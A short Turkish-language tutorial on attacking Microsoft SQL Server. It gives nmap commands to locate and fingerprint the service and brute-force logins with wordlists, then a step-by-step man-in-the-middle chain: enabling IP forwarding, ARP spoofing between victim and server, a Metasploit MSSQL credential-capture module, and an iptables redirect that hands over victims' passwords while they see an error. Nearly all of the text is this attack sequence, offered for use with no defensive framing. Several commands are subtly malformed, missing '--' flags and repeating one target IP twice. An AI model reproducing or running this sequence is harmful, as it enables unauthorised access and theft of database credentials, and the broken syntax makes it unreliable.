Microsoft SQL Server 1433 numaralı port üzerinden çalışır. Bazı yazılımcılar farklı portlar kullanabilirler. Eğer diğer portları bulmak istiyorsanız NMAPi(Güvenlik tarayıcısı) kullanabilirsiniz. Örnek verecek olursak;
$ nmap -n <IP> -p PORT (Bu kod ile port üzerindeki server hakkında bilgi alınabilir)
$ nmap -p PORT script ms-sql-info <IP> (Detaylı Bilgi Almak için kullanılır)
$ nmap -p <PORT> script ms-sql-brute script-args mssql.instance-all,userdb=wordlist.txt,passdb=wordlist.txt <IP> (Ipdeki servera ait account bilgilerine sahipr olmak gerekmektedir bu şekilde user ve passworde ulaşılabilinir.)
$ echo 1 > /proc/sys/net/ipv4/ip_forward (Ip Yönlendirmesi yapıyoruz, Kali Linux işletim sisteminde bulunan arpspoof ile hedef ve sunucu arasına girilmiş oldu. )
Sırası ile yapınız
$ arpspoof -i eth0 -t <SQL SERVER IP> <Kurban IP>
$ arpspoof -i eth0 -t <Saldırı Yapılacak IP> <Saldırı Yapılacak IP>
$ use auxiliary/server/capture/mssql
$ set SRVPORT PORT
$ iptables -t nat -A PREROUTING -p tcp -d 192.168.48.130 dport PORT -j REDIRECT to-ports PORT (Saldırılan hesap bilgilerini girdiğinde yazılım hesap bilgilerini yakalayıp bize verecek ve saldırdığımız Servera kullanıcı giriş yapmak istediğinde Additional Information hatası alacak )
